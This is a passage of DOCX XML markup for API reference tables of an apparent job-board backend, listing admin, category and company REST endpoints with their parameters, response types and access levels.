              <w:t>Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Execution Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/admin/stats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / AdminStatsDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Returns platform-wide metrics: total users, active jobs, applications, offers, and hiring velocity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/admin/users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Query: role, search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / List&lt;UserAdminDto&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Returns user accounts with status badges and creation dates.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT /api/admin/users/{id}/toggle-status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / { status }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Toggles user enabled flag, suspending or restoring account access immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/admin/logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Query: page, size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / Page&lt;AuditLogDto&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Returns immutable security audit stream (who performed what action from which IP).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Controller: CategoryController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Base URI Mapping: /api/categories | Primary Domain: Job Classification Taxonomy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Injected Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>CategoryService / CategoryRepository</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2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Method &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Response Code / DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Execution Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/categories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / List&lt;CategoryDto&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Returns taxonomy of job categories (Software Engineering, Data Science, DevOps, Product).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Controller: CompanyController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Base URI Mapping: /api/companies | Primary Domain: Enterprise Employer Directory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Injected Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>CompanyService / CompanyRepository</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2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Method &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Response Code / DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Execution Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/companies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Query: verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / List&lt;CompanyDto&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
